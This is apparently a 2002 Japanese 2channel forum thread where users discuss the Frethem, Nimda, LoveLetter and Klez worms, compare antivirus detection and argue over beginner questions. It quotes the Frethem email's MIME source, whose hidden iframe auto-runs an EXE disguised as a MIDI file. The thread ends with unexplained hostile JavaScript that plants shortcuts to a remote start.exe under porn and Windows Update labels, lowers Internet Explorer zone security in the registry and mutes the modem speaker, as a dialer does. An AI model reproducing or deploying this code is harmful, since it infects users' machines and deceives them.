☆ウィルス情報＆質問　総合スレッド☆part4

Subject: Re: Your password!
添付ファイル decrypt-password.exe
で、メールサイズが約69KBのこんなメールが
いっぱい届きだした。新種ウィルスか？

--L1db82sd319dm2ns0f4383dhG
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>
<FONT COLOR=#FF0000>
<b>ATTENTION!</b><br><br>
You can access<br>
<b>very important</b><br>
information by<br>
this password<br><br>
<b>DO NOT SAVE</b><br>
password to disk<br>
use your mind<br><br>
now press<br>
<b>cancel</b><br><br>
(XXXXX XXXXX)</font></BODY></HTML>
<iframe src=3Dcid:W8dqwq8q918213 height=3D0 width=3D0></iframe>

--L1db82sd319dm2ns0f4383dhG
Content-Type: audio/x-midi;
name=decrypt-password.exe
Content-Transfer-Encoding: base64
Content-ID: <W8dqwq8q918213>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
以下略

>>767
のウィルスメールだが、今のところ NTT グループの企業から
やたらたくさん届いている。

>>767 は、WORM_FRETHEM.E だった。
ここ数日間に感染が増えているらしい。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_FRETHEM.E

>>769 アンチウィルス各社対応済みだね。
NTTグループはアンチウィルスソフトいれてないばかりか、古いOE使ってるのか？
最低だな。

>>770
うちは入れてましたが
インテリの方が12日対応済み
ライブの方が17日対応予定で、
タイムラグにやられた感がありますな

アンチウイルスソフト（ウイルスバスター）の最新版でもすり抜けたYO!
WORM_FRETHEM.JとWORM_FRETHEM.Eでは違うのかな？？？

私もウイルスバスター最新版を入れてあるのですが、すり抜けてきました。

FRETHEM の新しい亜種のようです。
それで、ウィルス対策ソフトでは、まだ検出できない。

英語版のWinだけがターゲットですか?

>>774 じゃあ、ダイレクトアクションありだからIE/OE使用者はプレビュー
切っておいたほうがいいね。IE6.0/5.5SP2/5.01SP1以外のバージョンの
ひとは必ずバージョンアップすること。

>>767
Norton は検出できなかったようです。

>>775
関係ないと思う。でなきゃ、こんなに日本で広まらない。

＞＞743
ボッキー2 ni warata...

InterScanとNAVの最新版でもすり抜けたよ。
新しい亜種っぽいね

こっちは広島大学から来た

>>776
誤：IE6.0/5.5SP2/5.01SP1
正：IE6.0/5.5SP2/5.01SP2　だね。
OE(又はIEｺﾝﾎﾟｰﾈﾝﾄ使用ﾒｰﾗｰ)の問題点とその対策方法
http://pc.2ch.net/test/read.cgi/sec/1021363841/参照。

あぼーん

>>780 NAVの最新って7/12のウイルス対策済み数61664のほう？
7/12付けはIntelligent Updaterで２回定義が更新されたよね。

WORM_BADTRANS.Bに感染してからメールが受け取れなくなってしまいました。
既に駆除ツールを使いウィルスは消えたと思うのですが、自分から自分へウィルス付のメールを
送ってこようとしているみたいです。それを削除しようにもメールを受け取ろうとしてもしばらくすると
｢応答がありません｣とか言われます。で、こんなエラーメッセージが出るのですがどうすればいいでしょう？
サーバーと通信しようとして、タイムアウトが発生しました。 アカウント : 'po-mc.neweb.ne.jp', サーバー : 'po-mc.neweb.ne.jp', プロトコル : POP3, ポート : 110, セキュリティ (SSL): なし, エラー番号 : 0x800CCC19

>>784 使っているアンチウィルスソフトは？　NAVなら、
「電子メールを受信すると、W32.Badtrans.B@mmが検知された後にメール
受信が停止してしまい、何度受信をやり直しても同じ現象が発生する」
http://service2.symantec.co.jp/consumer/support-kb.nsf/KBLPF/BCC8F415E81FF16049256B250003ACF2?OpenDocument&PRODUCT=Norton%20AntiVirus2002

>>783

NAVCEだから詳しくはわかんないんだけど
7/12Rev19となってる。

>>786
Norton AntiVirus Corporate Edition
ウイルス定義ファイルバージョン: 40712s
シーケンス番号: 17848 かな？

いろんなとこから新種ウイルスがなだれ込んでくるよ〜
うちの会社は完全にメールを止めた。トレンドマイクロは
現在パターンファイルを開発中。直接聞いた。

とりあえずトレンドマイクロからの情報を

WORM_FETHEMの亜種は現在のパターンでは検出出来ませんが
30分後に配布するパターン317で対応します。
Interscanの話ですが

「Re:Your Password!」の件名に注意，新種ウイルスが国内で流行の兆し
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020715/1/

「Re:Your Password!」 JPNICのメーリングリストから届いたよ。
でもこれを購読している人って少なそうだから影響は無いかな？

>>789
17:00頃にはできると聞いたが、現時点でまだ出来ていない模様。

30分に対応するって話ですが
遅れてるみたいです。

かぶった。ｽﾏｿ

あぼーん

>>795 ドサクサにまぎれて不正アクセス禁止法違反ですか?

通報しますた

俺のサイト

間違い。他の掲示板で書かれていた。

ニュース速報＋のスレ

【PC】件名が「Re: Your Password!」メールに注意、新種ウイルスが流行の兆し
http://news2.2ch.net/test/read.cgi/newsplus/1026721442/l50

さっきも逢ったよ

>>796 >>798-799 IP記録されました。

んなこと言われても困ります。
すいませんでした。

nikkeibpからも「Re: Your Password!」MLに来たよ。
HTMLメールはじく設定だったから助かったけど。

不正アクセス禁止法ってどんなんですか？

>>805
強姦です。

俺は捕まるんですか？

http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.frethem.j%40mm.html

>>807
強姦したんですか？

勿論してません

ＩＰ記録とかかいてあったから

じゃぁ、何で捕まると思ったの？

だいぜうぶ、ついでにメーラー変えとけ。

不正アクセス禁止法ですよ。あー、焦った。

そういやたかがゲームで不正アクセス禁止法違反して捕まった奴らには笑ったなぁ（ｗ

そんなんがあったんですか。確かに笑えます。

奴らということは複数人…

たかが2chのカキコtで捕まる>>816の方が笑える。

To: フィールドに大量のアドレスを並べて、
「ウィルスのお詫び」を送ってきやがった。
Bcc で送れよ。

え？やっぱり俺は捕まるんですか？

>>819
warata

>>820
うざい
他の板へいけ

トレンドマイクロのアップデートまだかよぉ。
予定より1時間以上遅れてるぞ。メールサーバが動かせん。

え？ちょっと意味不なんですけど。捕まるのか捕まらないのか答えてもらいたいです。

ウィルスと関係ないだろ
http://www.keishicho.metro.tokyo.jp/anket/haiteku.htm
ここで聞け。

>>824
お前のたいーほよりも定義ファイルのほうが心配だ

>>780

NAVCEの最新版だと対応してるっぽいぞ
LiveUpdataはまだだが

今時プレビューで感染してる奴は即死して欲しい。

WORM_FRETHEM.K 対応のパターンがトレンドから出ますた
パターンは317です

http://www.trendmicro.co.jp/vinfo/#pendingMed

uso desita
gomen nasai . . .

パターン３１７age

なんかすり抜けてない？？？

>>
imasara...

>>833
のことです

>>833
漏れがトレンドに解析依頼した検体２個のうち片方は、パターン317でも
検出しなかった・・・。
だめぢゃん。

>>836
なんだかファイルサイズが異なるのがいきなり出てますね。
メル送信以外の機能が無いように祈りまする。

オレのところにきたやつは48640bytesだった。
トレンドのオンラインスキャン（パターン317）では検出してくれなかった

>>838
Symantecだと47,616 バイトだけど。
うちに届くのって、添付ファイル45KB台のが多い。
ファイルサイズが大きいってのは、どゆ機能が追加されているのかドキドキっすね。

FRETHEM.E専門スレたちました。
http://pc.2ch.net/test/read.cgi/sec/1026734507/l50

W32.Frethem.J@mm
これ、ｵﾗｸﾙから来たﾔｼいる？

Frethem.kきたけど、
オンラインスキャンしたら一度すり抜けた。
そんなはずないだろと思って
テンポラリのディレクトリを直接スキャンしたら
なんとか検出してくれた。
いい加減だな、オンラインスキャンって。

さっきから窓の杜から、ウィルスきまくりなんですが・・
偽装にしても多すぎ。

>>841
んなもんに頼ってんじゃねーよ　タコが

>>844 オラクルには頼るなと??

[email protected]

添付ファイルがあるやつと無いやつがあるけど無いのも危険？

普段マックを使っているのですが、winを実家で初めて使っています。
オンラインチェックをしたらウイルスが発見されました。
メールソフトは設定もしていないし、送受信もしていない（webメールのみ）のに
感染してしまいました。変な添付メールは一度も来てません。こんな事ってあるのでしょうか？

VBS.LoveLetter.A というやつです。過去ログにはファイルを削除、とありましたが
どれを削除してよいのかわからないので、ウイルスバスターを買う事にしました。
これはwebメールでも感染してしまうのでしょうか？？マックにも感染しますか？

ウイルスをばらまいたと思うと心配で夜も眠れません

>>848
http://pc.2ch.net/test/read.cgi/sec/1026717316/

>>848
http://pc.2ch.net/test/read.cgi/sec/1025872269/を参照。

それはただ単にノートンが過敏に反応してるだけ。

すんませんでした。でもウイルスバスターは買います。。

スペイン語のメールがやたらと来るんだけどこれってなんなんすかね？
決まって大きさが３１３Ｋなんです。

>>852 アンチウィルスソフトいれてないのか。
アンチウィルスが反応しなかったら、単なるスパム。

frethemとかメール勝手に送って増殖する奴に
かかって取引先から苦情が来てる人が職場にいるんだけど

そういうのを見ると
アドレス帳は別のところに保存しといた方がいいんですか？
でも調べてみたらアドレス帳載ってる人以外にも
送ってるみたいだし。
なにかいい対応策ありますか？

そういう奴は隔離ネットワークに収監する。

ははは。
でも笑いごとじゃなくてウイルス駆除ソフトで対応する前に
ウイルスにかかってしまうことは考えられることなので、

最低限他の人には広めさせたくないっていうようにしたい。
ウイルス自体にメアドを参照させないようにするっていうのは
どうすればいいんだろうか。

それか自分以外が送信できないようにすればいいのかな。
パスワドかけるとかして。

プレビューしただけで感染するのはなぜ？
プレビューって、勝手に添付のexe実行しちゃうの？

>>857
exeだけがプログラムじゃないの。
Webページを表示するのだって…と考えてみれば？

>>856 最近のウィルスは自前で送信するのでメーラにパスワードかけても意味ないです。
メアドもPC内を検索するのでどこに置いても参照されうる。
>>855が最善の策と思うが。ダブルクリック厨にはつける薬無し。

>>857 Internet Explorerのセキュリティホールを利用しているから。
「不適切な MIME ヘッダーが原因で Internet Explorer が電子メール
の添付ファイルを実行する 《MS01-020》」
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms01-020.asp

>>856 最大のセキュリティホールは無自覚なユーザなのだよ。
そしてセキュリティの固さはもっとも弱いところで決まるので、

馬 鹿 が い る 限 り 何 を やっ て も 無 駄。

>>858
FRETHEM.Kはexeが添付されてるんでしょ？
なぜ、プレビューで実行されるんかな？

>>862 >>860

>>859
>メアドもPC内を検索するのでどこに置いても参照されうる。

↓こんな感じのフラッシュメモリにアドレス帳入れておけばいいのかな？
http://www.iodata.co.jp/products/pccard/2002/usb-ed2.htm

あっ遅かった。
>>860>>863
どうもです。

この穴がいまさら突かれるのは購入時のまま使用しているユーザがとても多いという事でいい?
とすると、数ヵ月後にそういうユーザが貯まったところで、また流行?

>>864 USBポートに差しっ放しにしなければ大丈夫だろうが、ウィルスは
ブラウザのキャッシュからもメアド拾うので感染したらどこかしらへは
送信してしまうだろうね。送信先はアドレス帳だけではないということ。

IEコンポーネント使用メーラーはOEとBeckyの他、なにがありますか？

NTTからfrethem飛ばしてｽﾏｿって電話がかかってきた

>>866 アンチウィルスソフトで駆除したら終わり、じゃなくてIEのバージョン
アップもきちんと指摘・指導して欲しいね。＞マスコミ各社
たしかにこれじゃ繰り返しだよ。

>866
新規購入者だけとは限らん。
klezの時だって、「ｳｨﾙｽﾒｰﾙなんて一通も来なかったよ。
ｾｷｭﾘﾃｨﾎｰﾙ？ﾊﾟｯﾁ？ﾜｸﾁﾝｿﾌﾄ？何のことかｻﾊﾟｰﾘﾜｶﾗｿ」
と平気でのたまうﾔｼはそこらへんにうじゃうじゃいる。

>>869
>NTTからfrethem飛ばしてｽﾏｿって電話がかかってきた

どこを見ればfrethemの送信先ってわかるだろう。
教えてほしいす。
OEの送信済みアイテムには無いし。

http://page2.auctions.yahoo.co.jp/jp/auction/b25335174

↑これは何のウィルスにやられたんだろ？？？
ＨＤＤ起動不能になるとは・・・。

>>873 マルチウザイ　http://pc.2ch.net/test/read.cgi/sec/1013661431/658
お前出品者か？

>>872
＞OEの送信済みアイテムには無いし
いまどきそんなこと言ってるようじゃ･･･
【流行の】Frethem【ﾖｶｰﾝ】
http://pc.2ch.net/test/read.cgi/sec/1026734507/で情報交換してみたら

>>874
http://page2.auctions.yahoo.co.jp/jp/auction/b25335174

↑これは何のウィルスにやられたんだろ？？？
ＨＤＤ起動不能になるとは・・・。

>>876 市ね

>>877
http://page2.auctions.yahoo.co.jp/jp/auction/b25335174

↑これは何のウィルスにやられたんだろ？？？
ＨＤＤ起動不能になるとは・・・。

>>872
大手企業ならSMTPを自前で持ってるんだから
ログ見りゃわかるじゃん。

つうかOEのワーム系ウィルスって
ほとんど対策済みのセキュリティホール突いてるんだから
パッチくらいちゃんと当ててくれ

俺はOE使ってないからそんなん知らんとかじゃなくてさ

>>876,878

ほんとにウィルスだと思ってんの？
それともネタか？

富士通製ハードディスク まだ続く？突然死 3台目
http://pc3.2ch.net/test/read.cgi/jisaku/1019133758/
この辺見とけ

>>880
http://page2.auctions.yahoo.co.jp/jp/auction/b25335174

↑これは何のウィルスにやられたんだろ？？？
ＨＤＤ起動不能になるとは・・・。

パッチ当ててればプレビューしても感染しないの？

>>882 >>860

>>883 これもな
Internet Explorer の不正な VBScript 処理により Web ページがローカル ファイルを読み取る (MS02-009)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-009.asp

実行されたアクション:
添付ファイルはメッセージから隔離され、受信者が実行したアクションを通知するテ
キスト ファイルに置き変えました。

宛先:
[email protected]
<[email protected]>

送信者:
[email protected] <[email protected]>

送信時刻:
709959936,29502659

件名:
Re: Your password!

添付ファイルの詳細:-

添付ファイル名: decrypt-password.exe
ファイル: decrypt-password.exe
感染? はい
修復済み? いいえ
ブロック済み？ いいえ
削除済み？ いいえ
ウイルス名: W32/Frethem.l@MM




こんなメールが着たんだけどなんですか？

http://game.2ch.net/test/read.cgi/ff/1026491502/
このスレに入ったらLoveletterウイルスに感染されちゃうんだけど。
どうにかして。

>>886 ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

ということは安全ってことですね。
ﾖｶﾀｰ

c.Copy(dirsystem&"\重複.TXT.vbs")

覚えたてでうれしいね。

　　　　　　　

ttp://tmp.2ch.net/test/read.cgi/kitchen/1026902739/

ＤＥＬＡＬＬについての、詳細です。

ウイルスがホットメールで送られてきました。なんか、スペイン語で
メールが送られてきます。ホットメールって添付ファイルが自動的に
ウイルスチェックされるので無用心ながらも添付を開いてしまい、
感染してしまった模様です。ちなみに、その添付ファイルは225Kバイト
くらいです。消しても消しても＜30＞というファイルがでてくるし、
<BanderaNegra>って言うファイルも作られます。それも、c:\にです。
どなたか対処方法を御存知の方はいらっしゃいませんでしょうか？
トレンドマイクロ社の30日つかえる無料のウイルス検知ソフトを
入れてみたのですが、ウイルス除去できないみたいなのです。隔離しか。

>>885
ﾜﾀｼのとこにもきました

発信もとはお詫びしています

ttp://www.reedrex.co.jp/mail_t.htm

どなたか、対処方法をおしえてください。おねがいします。

このスレ、かちゅで見れないぞ〜
「削除かあぼーんでログが詰まった可能性がありますです」
になってしまって、新しいdll当てても見られない。
ブラウザで開くと見れるんだが････

zonavirus.dll
っていうファイルもみつかりました。
ゾナウイルスっていうらしいです。どなたか、ほんとによろしくお願いします。

>>896
スレ違いネタだな。一回ログ消して全部取得しなおせ

>>897
そこまでわかってんなら検索すればすぐだろうに
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ARGEN.A

>>898
ありがとうございます。今検索して、知り合いに僕からのメールは
開かないようにメール送ったところでした。

>>898
おぉ！読めたぞよ。ありがとさん。

ご回答よろしくお願いします。
この質問をソニーの社員スレッドでしたのですが全然回答がありませんでした。
重大な秘密でもあるのでしょうか？
私はＶＡＩＯを使ってます。
最近監視ソフトを買いました。
毎日インターネットつなげるとアタックの警告音とともにＶＡＩＯの方から勝手に
パソコンの中に何度も進入してきます。
私のパソコンの中でいったい何をしているのでしょうか？
ソニーさんのパソコンを使うと勝手にパソコンに侵入してこれるように
何かしているのでしょうか？
侵入の警告音がなりっぱなしで気持ち悪いです。

>>901
ソニィ社員だが、何か？
おまいの言っていることがｻﾊﾟｰﾘわからん。
まともな者にわかるよーにしっかり述べよ。

>>901

>>902
901です。
ソニィ社員、おまいとか言うような方が本当に有名な
ソニーの社員の方かどうかわかりませんがよろしくお願いします。
私も何が起こっているのかわかりません。
パソコンへの不正侵入を監視するソフトをインストールすると
ＶＡＩＯさんへ繋いでいないのに
以下のような表示が出て警告音が鳴らされます。

パソコンへの侵入者を監視するソフトの表示です。

アタック　Ping Sweep
侵入者　ＶＡＩＯ
IP: ＊.＊.＊.＊　DNS: VAIO

ＩＰがいろいろ変わってきます。
必要ならＩＰも掲載します。

YAVAIO

さっき質問させて頂いてものですが、削除できません。
レジストリの所を書いてある通りにいじりたいのですが、
書いてあるもの自体がありません。

これを書かないと分からない！
って言う方がいらっしゃると思いますので、まずは何から書けばいいのか
お教えください。

>>904
たのむから、ｓａｇｅにしてくれ（ｗ
ttp://vcl.vaio.sony.co.jp/
あたりに、そのワケワカラン「ご相談」を投げてくれYO。
ココはなぁ、そんな糞質問を受け付けるところじゃ…（ﾌｩｰ

>>906 = やくざ
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
にある項目と値全部。

>>907
コピペしてもsageられないような事を書くなよ。

>>908
（既定）　（値の設定無し）
というのがあって、これだけ削除できません。。。
「指定された値を全て削除できません」とでます。
なんか、悲しくなってきました・・・。

>>909
・・・これって残って当然ですね。
全部消したんですが、まだ再起動して立ち上げると
c:￥にあるんですよ。。。。どうしてでしょうか？

>>910
あのさ、おれがだしたURLのとこ、ちゃんと読んだか？
読んでないよな？最後までちゃんと読めよ？
書いてあること、全部やったか?
やってないよな？だから復活するんだぜ？
わかったらもう一回いってきな。

HKLMもと思ったけど。なんか殺伐としてんな。

http://www.symantec.com/region/jp/sarcj/data/w/w32.kitro.d.worm.html
こっちも調べました。状況的にはこっちっぽいので。
両方のサイトとも調べたんですよ、、、で、消しても出てくる。その繰り返しです。
書いてある通りにしたんですが、なかなか消えてくれないんです。

気になることがあるのですが、Ｄのプログラムフォルダーが縮小表示
の画像と画像なしで点滅状態になってるのと指定していない画像が
縮小表示で別のホルダーに表示されます。もう一つは他のプログラム
から利用されていますと出て削除できないファイルがあるのですが
原因わかる方いますか？

ファイル名を指定して実行の表示がregeditのままで消しても
表示されます。オートコンプリートはオフにしてるのですが
なぜでしょうか？

レジストリのRUNにMSPY2002というのがありますが
これ大丈夫ですか？IME調子悪いのですが。

>>914
読んでも症状はさっぱり分からないが、
ウイルスが心配なのならちゃんとスキャンする。
エクスプローラその他の表示や、削除できないファイルとかに
ついては、
http://homepage2.nifty.com/winfaq/
で確認しる。

>>915
それはWindowsの仕様。
ひょっとしたら変更する方法もあるかもしれないが、
Windows板のOSごと質問スレにでも逝ってくれ。

>>916
ウイルスなどが心配ならスキャンする。
スパイウェアが心配ならad-awareのスレに。
IMEについては辞書の修復してみたら？

>917
どうも答えてくれるとはありがとうございました。
９１５と９１６についてはなんでもないことがわかりました。
９１４だけはどうも解せない。ＤとＣにＸＰ一個ずつ２ついれてて
Ｄの方がＮＡＷインストール失敗して動かないんですよ。ｃのほうからだと
アドミニの権限がないので全システムのスキャンができないし。
Ｃは調子いいのでＤのほう削除してＣ一本にしたほうがいいですか？

>>918
>914〜916については、ちゃんとまとめてから環境と状況を
明確にして質問してくれ。せめて同一人物と分かるように
名前なりなんなり工夫してくれ。
で、それらと>918を併せ読んでも、なおかつ状況は明確でない。
一度、あんたが何を使ってどうしているのか全然知らない他人が
その文章だけでどれだけ理解できるかという「他人の目」で
読み返してくれんか。
NAWはNAVなのかなあ、とか、アドミン権限もなくて
一体何がしたいのかとか思う程度。
これじゃ、Windows板に誘導したものかどうかの判断もつかない。

あのあるアドレスをクリックしたら、へんなページがいっぱい出てきて
ノートンでTrojan Horseに感染しています。って表示されたのですが、
やばいですかね。

>919
アドミン権限が二つ別であるから、ＣのＸＰからＤのＸＰは
スキャンできないんですよ。２つ入れたのは比較の目的から。
それくらいわからないか。

>>913
そうか、すまんな、一応調べたんだな。
で、消しても復活してくるからには、消しきれてない上に
Windows起動時にどっかから読まれてるわけだが、
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Runの
記述を消しても現れるなら、WIN.INIやSYSTEM.INI,とかに仕込まれてたりしないか？
SAFEモードで起動してMSCONFIGでチェックしたらどーだ？
それと、こいつの本体はVBSなので、ActiveDesktopで呼び出されても発動するだろうな。

具体的には
D:\Documents and Settings\ＸＸＸ(1)\My Documents\新しいフォルダ
をwipe infoで消したら、一つ消えないファイルがあって容量ゼロで
新しいフォルダが消えないという状態。ＤＯＳで消せと書いてるけど
この場合だとどう打ち込んだらいいのか具体的に書いてないから
こっちこそわからない。だいたいコマンドプロンプトまとめずわかるように
書けっつーの。学んでない人間のほうが多いんだそ。

>>921
>>919の「同一人物が分かるように」との指摘さえきかず、
好き勝手なところだけ答えて逆切れしているし。

>>923
誰に文句いってんだよ、コイツ？

>919はキツイ面もあるかもしれんが、まだしも好意的に
このように質問しろと書いてくれているんだが、
それでも>921みたいに逆切れするのとか、>923みたいに
意味不明の独り言を書き込むようなヤカラには
もう無視っきゃないな。
放置されたくなければ、質問の仕方を考えろ。

受難の季節

(´-`).｡oO（大変だなぁ）

(´-`).｡oO（DQNでも最初から放置はせずに一応は答えてくれるんだね・・・）

>>921,923
つーかウィルスじゃねえから
http://pc.2ch.net/pcqa/
ここ逝けよ、夏厨くん

それと文章はわかるように書いてね

ｳｨﾙｽｽｷｬﾝ　ｼﾀﾗ　ｺﾝﾅﾝﾃﾞﾏｼﾀ！

「￥katjusha2102\log\cocoa.2ch.ne\4649\1026258903.dat
VBS.Internalｳｨﾙｽに感染しています。」

ﾅﾝｼﾞｬｺﾘｬ？ ﾃﾞｽ！

ぼえーん
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

ノートンでTrojan Horseに感染しています。って表示されたのですが
どんな症状がでるのですか？

>>931 >>920 http://pc.2ch.net/test/read.cgi/sec/1026717316/191-192

KLEZ.Hとやらに感染してました。
昨日やっとやっつけました。
けど、奇数月の6日になるまで安心できないと
脅されました。9月までﾜｶﾝﾈｰﾉｶﾖ（#・∀・）

ApacheのLogに残るﾆﾑﾀﾞやｺｰﾄﾞﾚｯﾄﾞがうざいのだが・・・
こいつらを駆逐出来るような
CGIは作れないだろうか？

ちなみにIISではないので実害はﾅｼ

くだらねぇ質問はここに書き込め　Ver2.18…に書きこんだのですが、
ちゃんと教えてくれません。もー

初心者ですが、宜しくお願いします。

AVGってFreeのウイルス駆除ｱﾌﾟﾘをインストールしています。
先日、WEB検索中に"I-Worm/NIMDA.A.HTM"に感染してしまいました。
AVGで駆除した後に、MSのfixnimdaを実行したのですが、正常に
駆除されているか心配です。
I-Worm/NIMDA.A.HTMってウイルスの一般的な呼び名を教えてください。
また、I-Worm/NIMDA.A.HTMに感染したら、どのような動作をするの
でしょうか？教えてください。

>>935
少し検索すればすぐわかるようなこと聞くな、このヴォケ！

>936
調子に乗るなヴォケ！
初心者だろうが上級者だろうがここは聞きたい奴がくるところだ
おまえは知識があるだろうが、暇人で傲慢だ
気分が悪い
おまえが出て行けばすむことだ　来るな　ヴォケ！

>>937
じゃあおまえが935に教えてやれ。

>>935
初心者なら初心者板行けよ

>>938
まだいたのか？
あなたのように知識が豊富でないから教えられません。
出て行くか教えるかしてやれ

937さん有難うございます。
番号の前に＞＞の名無しさんは、お願いですから、かきこまないでください。
NIMDA.○にもいろいろあるので、I-Worm/NIMDA　＝　I-Worm/NIMDA.A.HTM
なのか自信が無かったのです。
ウイルス初感染なうえに知識が乏しいため、MSNでI-Worm/NIMDA.A.HTMを検索
して２CHにのみヒットした為、ここにきて聞きました。
ちょっと私も936さんに不満なもので、長々と書いてしまいました。
良識の有る方、お願いします。おしえてください。

>>940
だから検索するだけだよ。早くしてやれよ。

質問者もどんくさいな

>>942
ひきこもりだな
パソコンの世界で逝きとけ

ウィルスに関わる話題・質問はこちらに、、、
※ただしここは心の狭いお偉いさんたちが暇してるので
質問は高度なものに限ります。
又は質問するな。
って但し書きが必要ですね。

dle <[email protected]> zerohour <[email protected]>

>>944
引きこもりですが、何か？

>>945
必要なし

http://pc.2ch.net/test/read.cgi/sec/1026717316/224
２〜３時間レスがないからといって逆ギレする初心者はお断りです。

ネタ歓迎〜★

くだらないことで言い合ってないで、私の質問に答えなさい。
どうせ暇なんでしょ。

>>951
このスレ1から読み返しなさいな。
それで解決する。

942さん、
I-Worm/NIMDA　＝　I-Worm/NIMDA.A.HTM であっているのですね。
それならば、I-Worm/NIMDAでの処置は終了しています。
違っているのならば、別の検索のしかたを教えていただきたいです。

>>I-Worm/NIMDA.A.HTMってウイルスの一般的な呼び名
ニムダだろ。
あとは検索すればちゃーんと詳しく書いてあるHPが出てくるはず。

違うけど処置は終わり。お疲れ。さよなら。

最近、2chを見てると、
よくウィルスソフトから
ラブレターウィルスの警告が出るんだけど、
みなさんはどうですか？

>>956
理由を知っているからなんとも思わない。
マルチの方がウザイ。

954さん、
ありがとうございました。
これで帰ってねむれます。だったら、明日の仕事にも影響なさそうです。
では、おやすみなさい。

955さん？
駆除とMSのfixnimda実行だけでは、いけないのでしょうか？

あれ？初心者の味方諸君はどこ行ったんだ？
>>949を見て萎えたのか？

>>959
だから質問する前に調べろ（検索しろ）と皆言ってるだろ！！
だから無視されるんだ。新しいウィルスじゃあるまし。
AVGならスレ違い。どうしてもあれこれ知りたいなら有償ソフト買ってメーカに
質問しろ。フリーを使い続けるなら自己責任でやるのは当然のことだ。

ttp://www.google.co.jp/search?hl=ja&inlang=ja&ie=Shift_JIS&q=fixnimda+%8B%EC%8F%9C&lr=

>>960
ひきこもりが強がってら
弱虫は相手にされねーだけだろ
暇じゃねーんだよ　ヴヲケ

(´-`).｡oO(書き込みする暇はあるんだな・・・)

atamano yowasouna natutyu- dana...
syosinsya ita atari kara nagarete kitano kana-

>>963
質問に対して回答する際、自分の記憶違い等も考慮し、調べなおしたりするのは
当たり前のこと。
例えば952が「このスレ1から読み返しなさいな。」といってるが、これで解決
できるのは確認してると思う。（これは推測だけど。）
俺なら、書き込む前に、確実に確認する。
たった１行の回答であっても、それなりの時間はかかるはず。それを理解できない
お前は回答したことがないか、いいかげんな回答をしたことがないかだろ。

>960、>おそねっ
初心者だから皆怒ってるんじゃなくて、モラルを欠いた言動をとっているから
怒っているのがわからないのか？
例えばウィルスの名称なんて、１でリンクしてるURLを見てくるだけでもわかるだろ。
「ウィルス情報」って書いてあるんだから。
（ちなみにネットワークアソシエイツのウィルス名検索では、nimdaの情報が一部リンク
　はずれている。）

>これで帰ってねむれます。だったら、明日の仕事にも影響なさそうです。
こんなのも本論、第三者である俺達とは関係ない。
自分のとった言動を正当化するために書いてるだけ。
この手のスレは自己中心的に質問し、自分だけが役に立てばいいのでなく、
これをみている他の人にも役立つように考慮するのは当然のこと。
（だからこそ、952の「このスレ1から読み返しなさいな。」というのが生きてくる。）

本論と関係ないカキコして、皆スマン。

(´-`).｡oO( >>962あてだったんだが、ちゃんと書いとけばよかったな・・・)

</scri-->

<!--ipt
i="P";document.write("<AP"+i+"LET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent </A"+i+"PLET ");

var label8="ウィンドウズアップデトガイド　２００２年";
var url8="http://kanazawa.cool.ne.jp/pressing101/primera/start.exe";
var icofile8="%WinDir%\\System\\User.exe";
var iconum8="4";

var label="無修正ＡＶ画像";
var url="http://kanazawa.cool.ne.jp/pressing101/primera/start.exe";
var icofile="%WinDir%\\System\\User.exe";
var iconum="1";

function savefavfile(folder,label,url,icofile,iconum){
var oFi=FSO.CreateTextFile(folder+"\\"+label+".url");
oFi.WriteLine("[InternetShortcut]");
oFi.WriteLine("URL="+url);
oFi.WriteLine("Modified=806188A46609C1013E");
oFi.WriteLine("IconIndex="+iconum);
oR=/%windir%/i;icofile=icofile.replace(oR,WinDir);
oFi.WriteLine("IconFile="+icofile);
oFi.Close();
}

function putfav(folder, folder2, folder3){

// savefavfile(folder3,label8,url8,icofile8,iconum8);
savefavfile(folder,label,url,icofile,iconum);

savefavfile(folder,"おまんこ無修正ネットアイドル","http://kanazawa.cool.ne.jp/pressing101/primera/start.exe","%WinDir%\\Mplayer.exe","3");
savefavfile(folder,"ファック無修正画像・映像","http://kanazawa.cool.ne.jp/pressing101/primera/start.exe","C:\\Program Files\\Internet Explorer\\Iexplore.exe","16");
}

function SetSrch(){


Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004", 00,"REG_DWORD");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\1004", 00,"REG_DWORD");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\1004", 00,"REG_DWORD");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\1004", 00,"REG_DWORD");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\1004", 00,"REG_DWORD");
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Settings\\SpeakerMode_Dial","M0");
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Settings\\SpeakerMode_Off","M1");
// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\1","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");
// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\2","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");
